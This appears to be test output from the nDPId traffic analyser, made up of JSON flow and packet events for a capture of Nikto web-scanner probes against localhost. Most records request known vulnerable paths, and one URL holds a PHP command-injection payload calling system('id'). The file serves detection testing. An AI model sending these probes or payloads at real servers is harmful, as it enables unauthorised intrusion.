-00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":1,"flow_last_seen":1576420277497,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277497,"pkt":"AAAAAAAAAAAAAAAACABFAAC8mG1AAEAGo8x\/AAABfwAAAcWYH5Bl4KC2nOMxboAYAED+sAAAAQEICp1m\/iGdZv4hR0VUIC9zc2RlZnMvIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDE5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277497,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ssdefs\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000019)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277498,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":1,"flow_last_seen":1576420277498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277498,"pkt":"AAAAAAAAAAAAAAAACABFAAC88otAAEAGSa5\/AAABfwAAAcWaH5CxdspY+6ys9YAYAED+sAAAAQEICp1m\/iKdZv4iR0VUIC9zc2hvbWUvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDIwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277498,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/sshome\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000020)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7440000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277499,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":1,"flow_last_seen":1576420277499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":200,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":200,"pkt_l4_len":166,"thread_ts_msec":1576420277499,"pkt":"AAAAAAAAAAAAAAAACABFAAC61XNAAEAGZsh\/AAABfwAAAcWcH5BK5u2wb4yQmIAYAED+rgAAAQEICp1m\/iOdZv4jR0VUIC90aWtpLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDIxKQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7440000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277499,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tiki\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000021)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277500,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":1,"flow_last_seen":1576420277500,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277500,"pkt":"AAAAAAAAAAAAAAAACABFAADKj49AAEAGrJx\/AAABfwAAAcWeH5BxerdT3YbEDoAYAED+vgAAAQEICp1m\/iSdZv4kR0VUIC90aWtpL3Rpa2ktaW5zdGFsbC5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAyMikNCg0K"} -01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277500,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tiki\/tiki-install.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000022)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277501,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":1,"flow_last_seen":1576420277501,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420277501,"pkt":"AAAAAAAAAAAAAAAACABFAADQ2RZAAEAGYw9\/AAABfwAAAcWgH5BlMeHM00k6b4AYAED+xAAAAQEICp1m\/iWdZv4lR0VUIC9zY3JpcHRzL3NhbXBsZXMvZGV0YWlscy5pZGMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAwMjMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277501,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/samples\/details.idc","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000023)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7440000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1576420277503,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":1,"flow_last_seen":1576420277503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":257,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":257,"pkt_l4_len":223,"thread_ts_msec":1576420277503,"pkt":"AAAAAAAAAAAAAAAACABFAADzlctAAEAGpjd\/AAABfwAAAcWiH5BEoK0q6pkm3YAYAED+5wAAAQEICp1m\/iedZv4nR0VUIC9mb3J1bWRpc3BsYXkucGhwP0dMT0JBTFNcW1xdPTEmZj0yJmNvbW1hPVwiLnN5c3RlbVwoJ2lkJ1wpXC5cIiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDA3MCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01117{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7440000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1576420277503,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forumdisplay.php?GLOBALS\\[\\]=1&f=2&comma=\\\".system\\('id'\\)\\.\\\"","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000070)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7440000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1576420277505,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":1,"flow_last_seen":1576420277505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":219,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":219,"pkt_l4_len":185,"thread_ts_msec":1576420277505,"pkt":"AAAAAAAAAAAAAAAACABFAADNh+tAAEAGtD1\/AAABfwAAAcWkH5AZpL8K5\/crh4AYAED+wQAAAQEICp1m\/imdZv4oR0VUIC9ndWVzdGJvb2svZ3Vlc3Rib29rLmh0bWwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAwNzEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7440000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1576420277505,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/guestbook\/guestbook.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000071)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420277506,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":1,"flow_last_seen":1576420277506,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1576420277506,"pkt":"AAAAAAAAAAAAAAAACABFAADSOPFAAEAGAzN\/AAABfwAAAcWmH5AZrAAQDbKHy4AYAED+xgAAAQEICp1m\/iqdZv4qR0VUIC9odG1sL2NnaS1iaW4vY2dpY3NvP3F1ZXJ5PUFBQSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDcyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420277506,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/html\/cgi-bin\/cgicso?query=AAA","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000072)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277509,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":1,"flow_last_seen":1576420277509,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277509,"pkt":"AAAAAAAAAAAAAAAACABFAADGjRRAAEAGrxt\/AAABfwAAAcWoH5A27bX0CottMYAYAED+ugAAAQEICp1m\/i2dZv4sR0VUIC9iYi1kbmJkL2ZheHN1cnZleSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDE0MikNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277509,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bb-dnbd\/faxsurvey","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000142)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277510,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":1,"flow_last_seen":1576420277510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277510,"pkt":"AAAAAAAAAAAAAAAACABFAADBP59AAEAG\/JV\/AAABfwAAAcWqH5D7oQd9r6h8pYAYAED+tQAAAQEICp1m\/i6dZv4uR0VUIC9jYXJ0Y2FydC5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAxNDMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277510,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cartcart.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000143)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277512,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":1,"flow_last_seen":1576420277512,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420277512,"pkt":"AAAAAAAAAAAAAAAACABFAADQQ2ZAAEAG+L9\/AAABfwAAAcWsH5AIFXuH0ihJCIAYAED+xAAAAQEICp1m\/i+dZv4vR0VUIC9zY3JpcHRzL0NhcmVsbG8vQ2FyZWxsby5kbGwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAxNDQpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277512,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/Carello\/Carello.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000144)"}} 